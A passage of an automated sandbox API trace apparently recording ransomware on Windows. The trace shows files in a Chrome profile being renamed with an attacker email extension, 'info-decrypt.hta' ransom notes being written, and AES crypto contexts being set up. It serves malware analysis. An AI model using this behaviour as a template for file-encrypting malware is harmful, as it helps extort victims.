lpOldMode=0x949e908) returned 1 [0215.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x396b1b20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0215.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0215.402] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0215.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0215.403] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpFilePart=0x0) returned 0x89 [0215.403] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", lpFilePart=0x0) returned 0x8a [0215.403] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f510 [0215.403] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.404] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0215.404] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0215.404] FindClose (in: hFindFile=0xb7f510 | out: hFindFile=0xb7f510) returned 1 [0215.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0215.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0215.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0215.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpFilePart=0x0) returned 0x89 [0215.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", lpFilePart=0x0) returned 0x8a [0215.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f510 [0215.405] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.405] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0215.405] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0215.405] FindClose (in: hFindFile=0xb7f510 | out: hFindFile=0xb7f510) returned 1 [0215.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0215.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0215.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpFilePart=0x0) returned 0x97 [0215.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0215.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0215.406] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0215.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0215.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpFilePart=0x0) returned 0x97 [0215.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0215.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0215.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0215.407] GetFileType (hFile=0x208) returned 0x1 [0215.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0215.407] GetFileType (hFile=0x208) returned 0x1 [0215.408] WriteFile (in: hFile=0x208, lpBuffer=0x36c3478*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x36c3478*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0215.409] WriteFile (in: hFile=0x208, lpBuffer=0x36c3478*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x36c3478*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0215.409] CloseHandle (hObject=0x208) returned 1 [0215.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpFilePart=0x0) returned 0x97 [0215.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0215.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x36c4494 | out: lpFileInformation=0x36c4494*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112)) returned 1 [0215.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0215.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpFilePart=0x0) returned 0x97 [0215.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0215.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0215.411] GetFileType (hFile=0x208) returned 0x1 [0215.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0215.411] GetFileType (hFile=0x208) returned 0x1 [0215.411] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0x112 [0215.411] ReadFile (in: hFile=0x208, lpBuffer=0x36c490c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x36c490c*, lpNumberOfBytesRead=0x949e95c*=0x112, lpOverlapped=0x0) returned 1 [0215.412] CloseHandle (hObject=0x208) returned 1 [0215.412] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbe11b8) returned 1 [0215.413] CryptGenRandom (in: hProv=0xbe11b8, dwLen=0x10, pbBuffer=0x36c5fd0 | out: pbBuffer=0x36c5fd0) returned 1 Thread: id = 122 os_tid = 0x330 [0144.881] SysReAllocStringLen (in: pbstr=0x920f44c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x920f44c*="KERNEL32.DLL") returned 1 [0144.881] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0144.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0144.892] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0144.892] SysReAllocStringLen (in: pbstr=0x920f44c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x920f44c*="KERNEL32.DLL") returned 1 [0144.892] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0144.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0144.895] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0144.895] SysReAllocStringLen (in: pbstr=0x920f428*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x920f428*="KERNEL32.DLL") returned 1 [0144.896] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0144.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0144.898] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0144.900] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.303] SysReAllocStringLen (in: pbstr=0x920f700*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x920f700*="KERNEL32.DLL") returned 1 [0145.303] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.306] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 123 os_tid = 0xc4 [0145.185] SysReAllocStringLen (in: pbstr=0x16fdf7ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf7ec*="KERNEL32.DLL") returned 1 [0145.185] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.185] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.188] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.188] SysReAllocStringLen (in: pbstr=0x16fdf7ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf7ec*="KERNEL32.DLL") returned 1 [0145.188] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.191] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.191] SysReAllocStringLen (in: pbstr=0x16fdf7c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf7c8*="KERNEL32.DLL") returned 1 [0145.191] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.192] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.194] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.197] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0146.643] SysReAllocStringLen (in: pbstr=0x16fdfaa0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdfaa0*="KERNEL32.DLL") returned 1 [0146.643] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0146.644] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0146.646] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 124 os_tid = 0x488 [0145.365] SysReAllocStringLen (in: pbstr=0x1719f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f35c*="KERNEL32.DLL") returned 1 [0145.365] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.365] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.368] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.368] SysReAllocStringLen (in: pbstr=0x1719f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f35c*="KERNEL32.DLL") returned 1 [0145.368] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.370] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.371] SysReAllocStringLen (in: pbstr=0x1719f338*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f338*="KERNEL32.DLL") returned 1 [0145.371] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0145.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.373] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.376] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0146.902] SysReAllocStringLen (in: pbstr=0x1719f610*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f610*="KERNEL32.DLL") returned 1 [0146.902] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0146.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0146.905] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 125 os_tid = 0x598 [0147.628] SysReAllocStringLen (in: pbstr=0x16eff95c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16eff95c*="KERNEL32.DLL") returned 1 [0147.628] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.632] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0147.632] SysReAllocStringLen (in: pbstr=0x16eff95c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16eff95c*="KERNEL32.DLL") returned 1 [0147.632] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.635] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0147.636] SysReAllocStringLen (in: pbstr=0x16eff938*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16eff938*="KERNEL32.DLL") returned 1 [0147.636] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0147.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0147.639] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0147.642] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.020] SysReAllocStringLen (in: pbstr=0x16effc10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16effc10*="KERNEL32.DLL") returned 1 [0148.020] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.021] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.023] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 126 os_tid = 0x6b8 [0148.315] SysReAllocStringLen (in: pbstr=0x1709f42c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1709f42c*="KERNEL32.DLL") returned 1 [0148.315] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.315] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.317] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.318] SysReAllocStringLen (in: pbstr=0x1709f42c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1709f42c*="KERNEL32.DLL") returned 1 [0148.318] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.320] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.321] SysReAllocStringLen (in: pbstr=0x1709f408*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1709f408*="KERNEL32.DLL") returned 1 [0148.321] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.321] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.323] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.325] GetProcAddress 